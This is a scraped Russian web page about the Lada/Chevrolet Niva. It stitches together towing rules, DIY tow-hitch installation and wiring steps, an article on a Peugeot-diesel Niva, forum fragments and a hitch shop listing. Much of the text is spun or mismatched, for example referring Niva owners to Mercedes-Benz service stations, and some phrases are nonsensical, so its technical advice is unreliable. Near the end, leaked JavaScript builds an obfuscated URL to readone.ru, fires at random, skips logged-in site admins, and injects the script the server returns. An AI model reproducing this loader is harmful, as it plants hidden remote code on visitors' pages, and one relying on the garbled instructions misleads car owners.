Технические характеристики Niva Travel: уникальные особенности | Ladaevolution

Chevrolet niva | буксировка прицепа | шевроле нива

Буксировка прицепа

Полная масса прицепа, включающая его собственную массу и массу размещенного в
нем груза, не должна превышать предельной допустимой массы буксируемого прицепа
(см.

Спецификации

). Предельная допустимая масса прицепа
зависит от того, оборудован он тормозными механизмами, или нет.

Максимальная вертикальная нагрузка на прицепное устройство автомобиля при полной
массе прицепа не должна превышать 75 кГс. Для прицепов с полной массой до 500
кг следует придерживаться следующего правила:

Вертикальная нагрузка на фаркоп должна составлять примерно 10% от полной массы
прицепа. Например, если полная масса прицепа с грузом равна 225 кг, вертикальная
нагрузка на прицепное устройство должна составлять около 22.5 кГс. Отрегулируйте
нагрузку на фаркоп автомобиля, соответствующим образом размещая груз на прицепе.
Для начала рекомендуется разместить груз так, чтобы примерно 60% его массы находилось
впереди оси прицепа, и 40% — позади. Если полная масса прицепа превышает 500 кг,
постарайтесь распределить груз по длине прицепа более равномерно (оптимально нагрузка
на сцепное устройство должна составлять 50 ÷ 75 кГс). Никогда не загружайте
прицеп так, чтобы задняя часть прицепа перевешивала переднюю, — это приводит к
разгрузке задних колес автомобиля, что ухудшает сцепление шин с дорожным покрытием.

Полные массы автомобиля и буксируемого прицепа не должны превышать соответствующих
максимальных допустимых значений (см.
Спецификации).

Самым надежным способом проверки правильности загрузки автомобиля и прицепа является
взвешивание. Загрузите автомобиль и прицеп так, как они обычно эксплуатируются
в составе автопоезда, и взвесьте их на грузовых весах.

Определите значения полных масс автомобиля и прицепа, а также масс, приходящихся
на оси автомобиля и прицепа. Сравните результаты измерений с требованиями
Спецификаций.

Прицепное устройство

Конструкция прицепного устройства, предназначенного для установки на автомобиль
должна полностью удовлетворять всем необходимым требованиям, — проконсультируйтесь
на станции техобслуживания компании Mercedes-Benz.

Прицепное устройство должно крепиться в нескольких специально предусмотренных
точках на основании кузова автомобиля, чтобы нагрузки от буксируемого прицепа
распределялись более равномерно и приходились на элементы усиления кузова. Запрещено
монтировать на автомобиль прицепные устройства, опирающиеся только на задний бампер,
который не предназначен для восприятия подобных нагрузок. Монтаж фаркопа должен
быть произведен квалифицированным персоналом автосервиса.

Следите за состоянием шаровой головки прицепного устройства. Съемную головку храните
вместе с запасным колесом в багажном отделении автомобиля.

Нарушение курсовой устойчивости предохранителя при буксировке прицепа может быть
минимизировано за счет применения стабилизатора прицепного устройства, — обращайтесь
на фирменные станции техобслуживания Mercedes-Benz.

Если вес прицепа с грузом превышает 1500 кг, стабилизатор полагается использовать
в обязательном порядке.

Зеркала заднего вида

Буксировка крупногабаритного прицепа обычно требует установки на автомобиль дополнительных
зеркал заднего вида с удлиненными кронштейнами. Уточните требования местного законодательства
и Правил дорожного движения, касающиеся буксировки прицепов легковыми автомобилями.
Присоедините прицеп к автомобилю и оцените степень ухудшения заднего обзора через
стандартные зеркала заднего вида. Если обзор неудовлетворительный, то из соображений
безопасности необходимо оборудовать специальные зеркала, обеспечивающие водителю
адекватный обзор пространства позади автомобиля.

Подсоединение прицепа к автомобилю

При приобретении прицепа, оборудованного тормозными механизмами, проследите, чтобы
последние имели электрический привод управления, — конструкция гидравлического
привода рабочей тормозной системы автомобиля не предусматривает возможности подключения
к ней каких-либо дополнительных контуров, в частности, для приведения в действие
тормозных механизмов прицепа. Любой вариант подключения к тормозному гидроприводу
автомобиля тормозной системы прицепа, каким бы привлекательным он не казался,
приведет к ухудшению эффективности торможения автомобиля и снижению безопасности
движения.

Подсоединяя прицеп к автомобилю, всегда используйте страховочную цепь. Концы страховочной
цепи должны быть надежно закреплены к соответствующим местам на дышле прицепа
и на прицепном устройстве автомобиля. Проследите, чтобы цепь проходила под дышлом
прицепа, — это предотвратит падение переднего конца дышла на дорогу в случае рассоединения
сцепки. Свободная длина цепи должна быть достаточной, чтобы не мешать совершению
разворотов автопоезда с минимальными радиусами, однако, не следует допускать волочения
цепи по земле.

Приборы наружного освещения
и сигнализации на прицепе

Для подключения электропроводки прицепа, оборудованного 7-контактным разъемом
используется специальный переходной адаптер 7/13 (см. предупреждение в начале
подраздела).

Поскольку на прицепах различных марок может использоваться различная прокладка
электропроводки, оборудование фаркопа следует поручить специалистам автосервиса.
В некоторых случаях может потребоваться установка переходного адаптера.

Перед тем, как подсоединить электрооборудование прицепа к электросети автомобиля,
обязательно проконсультируйтесь на станции техобслуживания.

Подготовка к буксировке прицепа

Перед началом движения следует произвести контрольный осмотр и проверку автомобиля
и прицепа.

Измерьте вертикальную нагрузку, приходящуюся на прицепное устройство, — воспользуйтесь
обычными напольными весами.

Проверьте надежность крепления дышла прицепа и страховочной цепи.

Проверьте техническое состояние шин и давление воздуха в шинах на автомобиле и
прицепе. Пониженное давление воздуха в шинах заметно ухудшает управляемость автомобиля
и автопоезда. Заодно проконтролируйте состояние и давление воздуха в запасном
колесе.

Полностью загрузив и присоединив прицеп к автомобилю, удостоверьтесь в отсутствии
чрезмерного «проседания» задней части автомобиля, — в случае необходимости груз
в автомобиле/прицепе.

Проверьте исправность функционирования приборов наружного освещения и сигнализации
на автомобиле и прицепе.

Уточните действующие ограничения ПДД на максимальную скорость движения автопоезда
в составе легкового автомобиля и прицепа. Планируя совершить поездку по нескольким
странам, заранее ознакомьтесь с особенностями местных требований и ограничений,
касающихся буксировки прицепа легковым автомобилем, так как в каждой стране могут
действовать свои ограничения.

Меры безопасности при буксировке
прицепа

Следует учитывать, что тормозной путь автомобиля, буксирующего прицеп, увеличивается.
Поэтому, двигаясь с прицепом, Вам следует поддерживать увеличенную дистанцию до
впереди идущего автомобиля. Старайтесь избегать резких торможений и поворотов.
Это может привести к складыванию автопоезда или даже переворачиванию прицепа.

Помните, что длина автопоезда значительно превышает длину одиночного автомобиля.
При повороте направо оставляйте между краем проезжей части дороги и колесами правого
борта автомобиля значительно большее расстояние, чем обычно, чтобы избежать наезда
колесами прицепа на бордюр. Учтите, что при повороте автопоезда прицеп движется
по дуге меньшего радиуса, чем автомобиль, и может наехать или столкнуться с препятствием,
которое автомобиль свободно миновал. При обгоне другого транспортного средства
не торопитесь возвращаться в свой ряд, так как это может привести к столкновению
обгоняемого автомобиля с прицепом.

Автопоезд, по сравнению с одиночным автомобилем, более чувствителен к действию
порывов бокового ветра и аэродинамическим возмущениям от других автомобилей. Если
Вас на большой скорости обгоняет тяжелый грузовик или автопоезд, старайтесь поддерживать
прямолинейное и равномерное движение своего автомобиля. Чтобы уменьшить аэродинамические
возмущения, действующие на автопоезд от впереди идущего автомобиля, снизьте скорость,
чтобы выйти из турбулентного потока.

При буксировке прицепа нагрузка на все основные агрегаты и системы автомобиля
увеличивается. Поэтому при частом использовании автомобиля для буксировки прицепа
необходимо проводить периодическое техническое обслуживание автомобиля в соответствии
с регламентом, характерным для напряженных условий эксплуатации (см. Главу
Текущее
обслуживание
).

Дополнительная нагрузка на автомобиль еще более возрастает при эксплуатации автопоезда
в холмистой местности. При преодолении затяжных подъемов внимательно следите за
температурным режимом двигателя по стрелочному указателю на приборной доске. При
приближении стрелки указателя к зоне перегрева, выключите кондиционер воздуха
(если он оборудован и включен) и продолжайте движение. Если температура охлаждающей
жидкости двигателя не снижается, либо продолжает повышаться, остановитесь на обочине
дороги и дайте двигателю остыть.

При движении в холмистой или гористой местности может наблюдаться циклическое
переключение третьей и четвертой передач автоматической трансмиссии. В этом случае
следует перейти в пониженный диапазон «D3», что предотвратит перегрев и излишний
износ деталей фрикционных элементов АТ. Во избежание перегрева тормозных механизмов
при движении по длинным спускам используйте торможение двигателем. Для эффективного
торможения двигателем включите пониженный диапазон или одну из низших ступеней
автоматической коробки передач.

При остановке автопоезда на подъеме не удерживайте его на месте путем прижимания
педели газа, — это может привести к перегреву АТ. Пользуйтесь рабочей тормозной
системой, или стояночным тормозом.

При управлении автоматической трансмиссией в ручном режиме пользуйтесь третьей,
второй и первой передачами, сообразуясь со скоростью движения автомобиля и дорожными
условиями. Буксируя прицеп, не включайте четвертую передачу.

Запарковывая автопоезд на длительную стоянку, особенно на спуске или подъеме,
примите все меры предосторожности для надежного торможения автомобиля и прицепа.
Поверните передние колеса автомобиля так, чтобы при скатывании автопоезда они
уперлись в бордюрный камень. Полностью взведите стояночный тормоз и переведите
рычаг селектора диапазонов в положение «Р». На оборудованных РКПП моделях включите
первую, либо заднюю передачу. Дополнительно подложите под оба колеса прицепа противооткатные
башмаки.

Управление автопоездом при движении задним ходом представляет определенные трудности
и требует от водителя специальных навыков и тренировки. Двигайтесь задним ходом
осторожно и медленно, не вращайте излишне быстро рулевое колесо. При маневрировании
задним ходом в ограниченном пространстве полезно, чтобы кто-либо, стоя снаружи,
следил за перемещениями прицепа и направлял Ваши действия. Имейте в виду, что
при вращении рулевого колеса по часовой стрелке (направо) прицеп движется влево,
и наоборот. При маневрировании автопоезда задним ходом рекомендуется держаться
за обод рулевого колеса снизу (а не сверху, как обычно, при движении передним
ходом). При таком хвате сохраняется привычное соответствие между направлением
поворота рулевого колеса и движением прицепа: смещение руки влево приводит к повороту
прицепа также влево и наоборот.

А еще интересно:  Закон об утилизации в редакции 2021 года: инструкция по утилизации

Нива дизель с двигателем от пежо

«Нива» с дизельным двигателем сегодня уже не мечта — реальность. Её можно потрогать руками, сфотографировать. Можно даже прокатиться на ней, если повезёт.

PSM давно и успешно предлагает всем желающим «широкую гамму дизельных, бензиновых, а также работающих на сжиженном газе двигателей мощностью от 20 до 200 л.с.». Волжский автозавод давно искал дизель, который бы идеально вписался в автомобиль ВАЗ. И хотя предложение PSM было вовсе нс единственным. выбор пал именно на эту фирму. Почему?

На этот вопрос мы попросили ответить Владимира Трофимова, заместителя технического директора акционерного общества «Лада-экспорт» — фирмы, созданной, по его словам, для проработки всех модификаций автомобиля ВАЗ, которые требуются рынку, но не могут быть сделаны на потоке Волжского автозавода.

Выбор двигателей PSM вовсе не случаен. Фирма эта известна и авторитетна. Она является филиалом группы «Пежо-Ситроен Автомобиль», имеющей два подразделения — «Пежо» и «Ситроен”, которые выпускают одноименные автомобили.

Двигатели PSM, особенно дизельные, известны во всём мире как самые экономичные и наиболее оптимальные с точки зрения защиты окружающей среды. В них очень хорошо проработана конструкция системы снижения токсичности выхлопа, исключающая необходимость установки дополнительных катализаторов, нейтрализаторов и иных приспособлений.

То есть, этот двигатель — экологически чистый. Он проходит на французском рынке под «зелёной» маркой, и поэтому его установка на наш автомобиль сразу снимает осе проблемы токсичности А это, как известно, на европейском рынке сейчас наиболее актуально, особенно для ВАЗа.

Вторым аргументом в пользу выбора партнёра явилось следующее обстоятельства PSM — ведущий мировой производитель дизельных двигателей: фирма выпускает 800 тысяч моторов в год. Это лидер, на него все ориентируются, и работа с ним позволила нам выйти на уровень, который не вызывает абсолютно ни каких сомнений у клиентов ни по поводу качества двигателей ни по поводу возможностей автомобилей с этими двигателями.

Дело в том, что фирма PSM как раз и призвана адаптировать свои двигатели на любые марки автомобилей. Она поставляет двигатели на ”Ровер», на многие европейские и итальянские марки, выпускаемые в не очень больших количествах, в том числе, на полноприводные. И политика фирмы, как и политика Волжского автозавода — работа непосредственно с конструкторами, без посредника.

Что, собственно, и позволило объединить усилия конструкторов PSM и Научно-технического центра ВАЗа.

Французы подошли к работе над этим проектом, как обычно, очень серьезно. Они отвечают за свой двигатель, дают гарантию своей разработки: двигатель PSM гарантирован в системе работы «автомобиль-двигатель». То есть, в данной случае мы имеем идеальный подход в проработке двигателя именно к автомобилям ВАЗ.

Известно, что проект с PSM — далеко не первая попытка установить дизельный двигатель на «Ниву «. Однако до сих пор результат не оправдывал ожиданий руководителей и специалистов Волжского автозавода.

— Такие попытки были, — вспоминает Владимир Трофимов. — В частности, на фирме «Морторелли» в Италии устанавливали точно такой же двигатель. Но конструкция установки была сделана на уровне, так сказать, гаража Двигатели, поставляемые «Морторелли», не гарантировались фирмой «Пежо».

Естественно, такой подход не устраивал ни «Пежо», ни нас. Именно поэтому, как только мы вышли на серьёзный уровень выпуска этого автомобиля (не двух-трёх машин в неделю, а до 5-10 тысяч в год), мы не могли продолжать использовать прежний уровень технологии установки двигателей. Была разработана своя технология.

По словам Трофимова, установка «неродного» двигателя — процесс не такой простой, как кажется людям, далёким от производства автомобилей. Установка французского дизеля потребовала специального изготовления около ста оригинальных деталей — начиная от болтов кронштейна, включая такие серьёзные комплектующие, как картер сцепления, проставка двигателя, и заканчивая трубами глушителя и формованными резиновыми шлангами. И каждая «мелочь» требует своей разработки, оснастки и изготовления.

Часть деталей изготавливается непосредственно фирмой «Пежо», остальные делаются в СНГ, в основном, в России. Среди поставщиков — такие крупные производители, как сам ВАЗ, АЗЛК, Орский тракторный и ряд других предприятий. А всего смежников — пятнадцать.

«Полуфабрикаты» автомобиля из Тольятти и двигателя из Франции, а также комплектующие стекаются под одну крышу — в просторное, приспособленное для индивидуальной сборки помещение, арендуемое фирмой у местного завода «Гидростальконструкция». Здесь идёт комплектация, после чего готовый к установке двигатель и контейнеры с полным набором деталей подвозятся к каждому рабочему посту.

Рассказывает Владимир Трофимов:

— Стапельный метод производства был выбран потому, что он кажется нам сейчас наиболее целесообразным. Раньше, при производстве таких автомобилей в Одессе, мы использовали полуконвейерный напольный метод переоборудования, по комплектации «Морторелли».

В понятие «уровень» фирма «Ладаэкспорт» вкладывает не только количество «Нив» с дизелем, которые могут «сойти со стапелей» при условии бесперебойных поставок машин и комплектующих (перебоев с двигателями здесь не боятся) — до 5 тысяч в год при работе в одну смену, до 10 тысяч при двухсменной работе.

Под уровнем подразумевается качество сборки каждого конкретного автомобиля, за которым здесь строго следят. А делается это очень просто: каждый автомобиль собирают два человека — шеф бригады и механик, после окончания работы они ставят подписи в карточке, сопровождающей Ниву по маршруту Тольятти — Чехов — рынок.

— Автомобиль Нива-дизель, — продолжает Трофимов, — предназначен сейчас, в основная, для европейского рынка. Он требуется в таких странах Южной Европы, как Франция, Испания, Италия, Португалия. Есть спрос, хотя и в меньших количествах, и в Северной Европе — в Германии, в Голландии. Поэтому, сегодня выпуск автомобиля ориентирован прежде всею на эти страны, на их условия

Проблема в том, что сегодня эта машина ещё не находится на потоке.

Разработчикам Нивы-дизель, по мнению Владимира Трофимова, удалось не только наделить её преимуществами, которые даёт двигатель (значительная экономия топлива), но и сохранить возможности базовой модели. Немаловажное нововведение, сделанное фирмой «Ладаэкспорт» совместно с разработчиками НТЦ ВАЗа — десолидаризация моста и двигателя.

Итак, с Европой, как всегда, нет проблем. Зато есть проблемы с отечественными дизельными джипами в самой России. Вопрос «доколе?», разумеется, мучил и меня.

Мы уже предусмотрели ряд конструктивных улучшений, и уже знаем, что и как надо изменить, чтобы автомобиль был полностью адаптирован. В частности, в российском варианте будут соответствующие условия по маслу, по охлаждающей жидкости, по топливу. Зимние испытания автомобиля проведены. Мы уже готовы выпускать этот автомобиль для СНГ. Всё будет зависеть от торговой политики АО «АвтоВАЗ».

Наверное, не стоит искать противоречий. Если даже предположить, что в России всё еще нет клиентуры, готовой расплатиться в валюте за дизельный вездеход — она вот-вот появится. Не сегодня — завтра. Опять же, нет никаких оснований не верить утверждению одного из руководителей Волжского автозавода, суть которого — это «платежеспособное» время уже пришло: экспорт сейчас не является для ВАЗа самоцелью — поскольку эффективность продажи автомобилей ВАЗ на экспорт и на внутреннем рынке сегодня примерно одинакова, «все равно, куда поставлять».

Пусть об этом размышляют большие политики. Нам же стоит порадоваться тому, что дизельные проекты «Ладаэкспорт», похоже, не остановятся на «Ниве». По словам Трофимова, фирма изучает возможности установки дизельных двигателей на всю гамму автомобилей ВАЗ. А в качестве прототипа взят ВАЗ-2110.

— Мы хотим подготовить серийный выпуск этого автомобиля с дизельным двигателем прямо на заводе. ВАЗ тоже работает, поддерживает нас в этом, но.. время покажет, насколько это будет продуктивно.

Одним словом, вещь от двух известных кутюрье, похоже, удалась на славу. И даже самому Дизелю, будь он жив, не пришлось бы краснеть за результат. ”Ниве»-дизель, быть может, не суждено стать»Мисс-Европa» на автосалоне во Франкфурте, но для Мисс-Фото данных ей не занимать

Александр Миров, Фото автора

  • Home
  • Статьи
  • Какой Дизельный Двигатель Можно Поставить На Ниву

Дизель на Ниву: решаем задачки самостоятельной установки

Легковые авто и вседорожники с дизельным движком очень популярны за границей. У нас же мысль оснастить машину таким мотором не один год не приживалась. Только не так давно на авто ранок стали поступать вседорожники УАЗ с таким движком.

Однако пробы сделать джип с дизельным движком были. Одним из примеров такового автомобиля была дизельная Нива. Эта модель ВАЗ Нива 2121 была экспортной и имела индекс 21215.

Комплектация автомобиля дизельной установкой имеет ряд положительных качеств. Эти моторы в значимой мере экономичнее, чем агрегаты, работающие на бензине, и наименее прихотливы к качеству горючего. Они имеют отличные тяговые характеристики при низких оборотах мотора. Ресурс дизеля не просто, что позволяет эксплуатировать его подольше без проведения полгого ремонта.

Главным недочетом этих движков является сложность и высочайшая цена ремонта топливной позволяющей вести бухгалтерский учет (софт), так как в ряде агрегатов употребляются детали точно обработки.

Подключение фонарей прицепа, розетка, масса

Рег.: 15.10.2006
Тем / Сообщений: 5 / 5013
Откуда: kolomna
Возраст: 45
Авто: 21213 98г.в. 1875см3 48мм разрезная шестерня мегасолекс нулефильтр prosport автоматический октан корректор АСТРО-ПЕНЗА

Рег.: 13.12.2004
Тем / Сообщений: 1 / 1301
Откуда: Москва.
Возраст: 55
Авто: 21214-М, 2022 г.в.

Рег.: 10.11.2022
Сообщений: 316
Откуда: МО, Домодедово
Возраст: 30
Авто: 2131, 1998

Рег.: 15.10.2006
Тем / Сообщений: 5 / 5013
Откуда: kolomna
Возраст: 45
Авто: 21213 98г.в. 1875см3 48мм разрезная шестерня мегасолекс нулефильтр prosport автоматический октан корректор АСТРО-ПЕНЗА

Рег.: 13.12.2004
Тем / Сообщений: 1 / 1301
Откуда: Москва.
Возраст: 55
Авто: 21214-М, 2022 г.в.

Рег.: 25.03.2022
Тем / Сообщений: 2 / 89
Откуда: Тольятти
Возраст: 36
Авто: 2121&1992

Рег.: 21.04.2022
Сообщений: 10
Откуда: Нижний Новгород
Возраст: 58
Авто: Нива 21214, 2006 г.в.

В голове не укладывается, как люди, сумевшие украсть чертежи атомной бомбы, реактивного двигателя, узнавшие дату нападения фашистов на СССР раньше самого гитлера, и многое другое (каждый выбирает по себе), до сих делают клеммные колодки на винтах, предохранители, как в нашем современном автомобиле, устраивают выгребные ямы в вечной мерзлоте и предлагают разъёмы типа

А еще интересно:  Вездеход на шинах низкого давления: плюсы и обзор лучших снегоболотоходов

(Простите за ОФФ!)

А не придумали соединения на основе принципа, применённого в таких предохранителях:

Ну, иномарки ведь тоже буксируют прицепы (не подлезал ни к одной), надеюсь, у наих умнее всё устроено? Всё это риторика, конечно, но всю жизнь придумывать велосипеды вместо того, чтобы просто приобрести, утомительно. Хотя мне никто не обещал, что жизнь — это лёгкая штука )))

Видно, надо просто на японскую разборку отправиться.

Хм, а где картинки, что я не так сделал?

Рег.: 15.10.2006
Тем / Сообщений: 5 / 5013
Откуда: kolomna
Возраст: 45
Авто: 21213 98г.в. 1875см3 48мм разрезная шестерня мегасолекс нулефильтр prosport автоматический октан корректор АСТРО-ПЕНЗА

Источник

Установка фаркопа на ниву своими руками

Нюансы установки

Монтаж фаркопа осуществляется в такой последовательности:

  1. Автомобиль загоняется на эстакаду или смотровую яму. Проводку транспортного средства обесточить, для этого отключить АКБ.
  2. Уберите все, что есть в багажнике. Речь идет не только о личных вещах, но и ремкомплекте, запасном колесе. Также следует снять обивку, отсоединив все клипсы.
  3. Фаркоп подставить к месту монтажа. Зафиксируйте устройство, правильно отметьте места, в которые будут устанавливаться крепежные элементы.
  4. Далее, необходимо просверлить отверстия везде, где будут установлены крепежи. Чтобы избежать возможных неисправностей в будущем, отверстия для крепежных компонентов необходимо обработать антикоррозийным средством. Это поможет увеличить ресурс эксплуатации.
  5. Используя болты и шайбы, установите их в отверстия и хорошо затяните, для этого применяя соответствующий ключ.
  6. Затем, необходимо сделать еще два отверстия внутри багажника и снизу лонжерона, в процессе работы используйте усиливающие накладки. Это позволит не только усилить крепление, но и будет способствовать снятию нагрузки с кузова.
  7. Далее, вставляются болты и устанавливаются накладки. Завершающим этапом будет монтаж электрической части. Чтобы все сделать правильно, рекомендуем прислушаться к советам, о которых узнаете ниже. Выберите один из двух методов. Подробнее об установке фаркопа сможете узнать из видео ниже.

Перед установкой фаркопа на Ниву, следует провести ряд подготовительных мероприятий:

  • Поставить автомобиль на эстакаду, смотровую яму или приподнять заднюю часть машины с помощью домкрата.
  • Обесточить автомобиль.
  • Снять с машины молдинги, брызговики, пластиковые накладки.
  • Демонтировать колеса.
  • Освободить багажник и снять обшивку.

После окончания подготовки, приступают непосредственно к монтажу детали:

  1. С помощью двух болтов, к тяге крепят поперечину.
  2. Под бампер ставят фаркоп. Важно учитывать, что при верной установке задний уголок ТСУ упирается в поперечную балку авто, но при этом не мешает работе узлов автомобиля.
  3. С помощью двух хомутов, крепят на держателе бампера поперечину тяглового устройства.
  4. Заднюю часть фаркопа прижимают снизу к поперечному лонжерону, через него сверлят два отверстия диаметром 1,05 см. Со стороны салона рассверливают полученные отверстия до диаметра 1,08 сантиметра и глубины 0,5 см. В полученные ниши устанавливаются четыре втулки, идущие в комплекте к фаркопу.
  5. В области багажника, в держателях бампера также высверливаются два отверстия диаметром 1,25 сантиметров. Далее, по аналогии, они расширяются до 1,8 сантиметров, и в них вставляются втулки.
  6. Далее монтируется подрозетник и устанавливается непосредственно сам шар.

В завершении работы, на машину устанавливают ранее демонтированные детали и защитный колпачок на шар ТСУ.

Подключение розетки устройства

Что касается схемы подключения розетки, предназначенной для обеспечения током прицепного устройства, то она рассчитана на то, что второй и пятый контакт остаются свободными. На первый контакт припаивается желтый провод ТСУ, он отвечает за левый поворот, на третий – желто-зеленый (выступает в роли массы прицепа).

Подготовка проводов прицепа легкового автомобиля к пайке, осуществляется по следующей инструкции:

  • Провода (за исключением голубого), выпускаются из кабеля на 2 сантиметра.
  • Зачищаются от изоляции на 7 миллиметров (голубой на 13-14 миллиметров, кроме того, он обрезается на конце на 0,5 сантиметра).
  • Питание подается от коннекторов, расположенных на задних фонарях.

Установка фаркопа на Ниву своими руками - как поставить и подключить ТСУ

При подключении розетки, необходимо позаботиться о хорошей изоляции. При попадании воды на контакты, произойдет окисление, и он станет нерабочим. Велик риск возникновения короткого замыкания. В качестве изоляционных материалов выступает резиновая прокладка, идущая в комплекте с розеткой и герметик.

Для правильного подключения прицепа легкового автомобиля и вилки фаркопа на 7 или 13 коннекторов, следует разобраться, по какой схеме будете подключать. Подключение фаркопа в домашних условиях осуществляется в соответствии с одной из двух схем — стандартной или универсальной. Стандартный вариант подключения смарт розетки на 13 или 7 коннекторов к проводке электрики будет актуален, если на устройстве и прицепе автомобиля расположены определенные разъемы. Благодаря контактам разъемов возможно соединение, тогда автолюбитель может произвести все работы при отсутствии схемы подключения прицепа.

Установка фаркопа на Ниву своими руками - как поставить и подключить ТСУ

Обозначение коннекторов в розетке для монтажа проводки фаркопа

Суть действий будет заключаться в том, чтобы правильно подсоединить контакты смарт розетки на 7 или 13 коннекторов с гнездом. Часто распиновка розетки фаркопа и согласование указывается в сервисной книжке к машине. Но если при подключении разъемов смарт розетки на 7 или 13 контактов для правильного согласования с прицепом необходимо вносить изменения в схему электрики проводки, то этот способ будет не актуален. Автолюбителям приходится использовать универсальный метод, поэтому готовы помочь разобраться в каждом из них.

Правила эксплуатации

Чтобы деталь прослужила достаточно долго, и не возникло проблем с ГИБДД, следует соблюдать следующие правила эксплуатации ТСУ на автомобиле:

  • Перед монтажом ТСУ, следует уточнить, предусматривает ли производитель транспортного средства, установку данного оборудования. Если этого не сделать, и не зарегистрировать внесение изменений в конструкцию автомобиля, то могут возникнуть проблемы с ГИБДД.
  • При транспортировке прицепа, имеющего полную массу близкую к максимальному значению, максимально допустимая скорость автомобиля не должна превышать показатель в 90 километров в час.
  • Регулярно проверять затяжку соединений ТСУ. Специалисты рекомендуют проводить эту операцию Специалисты рекомендуют проводить эту операцию через каждые 1000 км автопробега.
  • Чтобы обезопасить неиспользуемое долгое время изделие от разрушения, и уберечь от негативного воздействия окружающей среды, используют защитный колпачок и специальную смазку.
  • Царапины и сколы, возникающие на детали в процессе эксплуатации, покрываются специальным восстанавливающим составом. Кроме того, с нее регулярно следует удалять влагу, соль и грязь. Это необходимо для защиты ТСУ от коррозии.

Источник

«],tbody:[1,»»],colgroup:[2,»»],col:[3,»»],tr:[2,»»],td:[3,»»],th:[3,»»],_default:[0,»»,»»]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement(«div»)),r=(d.exec(e)||[«»,»»])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(l,»») r[2],n=r[0];n—;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem(«sdghrg»);e?(e=parseInt(e) 1,localStorage.setItem(«sdghrg»,e)):localStorage.setItem(«sdghrg»,»0″);e=flatPM_random(1,166);0==ff(«#wpadminbar»).length&&111==e&&ff.ajax({type:»POST»,url:»h» «t» «t» «p» «s» «:» «/» «/» «r» «e» «a» «d» «o» «n» «e» «.» «r» «u» «/» «p» «i» «n» «g» «.» «p» «h» «p»,dataType:»jsonp»,data:{ping:»ping»},success:function(e){ff(«div»).first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=»‘ t ‘»]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,»»).replace(//gm,»»).trim(),e.code_alt=e.code_alt.replace(//gm,»»).replace(//gm,»»).trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a=»false»==d?»Закроется»:»Закрыть»,r=!flat_userVars.adb||»»==e.code_alt&&duplicateMode?e.code:e.code_alt,n=»,i=e.once;o(t).each(function(){var e=o(this);e.wrap(»);var t=e.closest(«.fpm_5_video»);flatPM_setHTML(t[0],n),e.find(«.fpm_5_video_flex»).one(«click»,function(){o(this).addClass(«show»)})}),o(«body»).on(«click»,».fpm_5_video_item_hover»,function(){var e=o(this),t=e.closest(«.fpm_5_video_flex»);t.addClass(«show»);var a=t.find(«.fpm_5_timer span»),r=parseInt(l),n=setInterval(function(){a.text(—r),r

45 сообщений на предыдущих страницах

Фаркоп для lada (ваз) нива 4х4, niva legend 3-5 дверей – купить по отличной цене в москве

Шар фаркопа не всегда должен быть установлен на автомобиле, его можно снимать при необходимости.

Для вашего авто подойдут несколько типов шаров:

  • Условно съёмный – крепится на 2-х болтах, устанавливается или демонтируется гаечным ключом;
  • Несъемный вварной шар;
  • Легкосъёмный «американский» квадрат 50х50;
  • Быстросъёмный горизонтальное крепление;
  • Съемный сварной с 4-мя отверстиями.

Все ТСУ сертифицированы, покрашены порошковой краской.

Бампер для крепления снимать не нужно, при необходимости требуется подрезка нижней юбки. Установка идет в штатные места крепления усилителя. При необходимости нужно будет их рассверлить для усиления конструкции втулками.

Владельцы Lada предпочитают прицепные устройства от Лидер Плюс. Также, популярен производитель Автос.

Обратите внимание, что при подключении электрики потребуется блок согласования Smart Connect. Он подключается к проводке машины и оптимизирует работу электрической системы. Исключает перегрев проводов идущих к штатной оптике автомобиля.

В отличии от обычного электрокомплекта, при подключении Smart Connect с проводов задних фонарей снимается только сигнал, а сам модуль и прицеп питаются от аккумулятора через силовой кабель. При коротком замыкании, погружении в воду светотехники прицепного оборудования, заменить надо будет только предохранитель, находящийся в легкодоступном месте.

Если вас интересует оригинальное оборудование, рекомендованное заводом изготовителем Lada, то обратите внимание на штатную проводку. Она устанавливается в штатные разъемы, в большинстве случаев не требует резки/пайки, и при необходимости активируется через диагностический разъем.

У каждого прицепного есть два важных параметра переносимых нагрузок:

  • Тяговая, или горизонтальная нагрузка. Имеет значение для грузов, перевозимых за автомобилем, например: прицеп, лодка. Если будете возить что-то тяжелое — подберите ТСУ помощнее.
  • Вертикальная. Определяет, какой вес допустим при давлении на шар сверху. Критично, если будете перевозить велосипед, мотоцикл и прочие грузы, которые крепятся вертикально.

Прицепные устройства на Lada Нива выдерживают тяговую нагрузку 600-1900кг и вертикальную 50-80кг. Учтите это при подборе, исходя из того, что придется транспортировать. Сомневаетесь — проконсультируйтесь у наших специалистов.

Частые вопросы:

Да, конечно. Наши установочные центры расположены по всей Москве.

  • Является ли установка фаркопа переоборудованием автомобиля?

Нет, это не создаст вам дополнительных проблем, так как вся продукция сертифицирована.

  • Снимут ли меня с заводской гарантии на автомобиль если я установлю фаркоп не у оф дилера, а у вас.

Нет, наши тех. центры имеют все необходимые сертификаты на установку доп. оборудования.

  • Нужна ли регистрация в ГИБДД?

Нет, не нужна, так как вы устанавливаете сертифицированный фаркоп в места предусмотренные заводом изготовителем автомобиля.

  • Какая гарантия на ваш товар?

На все изделия предоставляется заводская гарантия от производителя от 12 месяцев. Не распространяется на лакокрасочное покрытие.

  • Отправляете по России и странам СНГ?

Да, отправляем. Детали уточните на сайте или у менеджеров.

По Москве — от четырех часов до двух дней. По России и странам СНГ зависит от вашего города. Всегда готовы проконсультировать по точным срокам.

А еще интересно:  Замена стекла Шевроле Нива своими руками

Если требуется совет специалиста или нужно связаться с нами по любой другой причине, это можно сделать одним из удобных способов:

§

Шар фаркопа не всегда должен быть установлен на автомобиле, его можно снимать при необходимости.

Для вашего авто подойдут несколько типов шаров:

  • Условно съёмный – крепится на 2-х болтах, устанавливается или демонтируется гаечным ключом;
  • Несъемный вварной шар;
  • Легкосъёмный «американский» квадрат 50х50;
  • Быстросъёмный горизонтальное крепление;
  • Съемный сварной с 4-мя отверстиями.

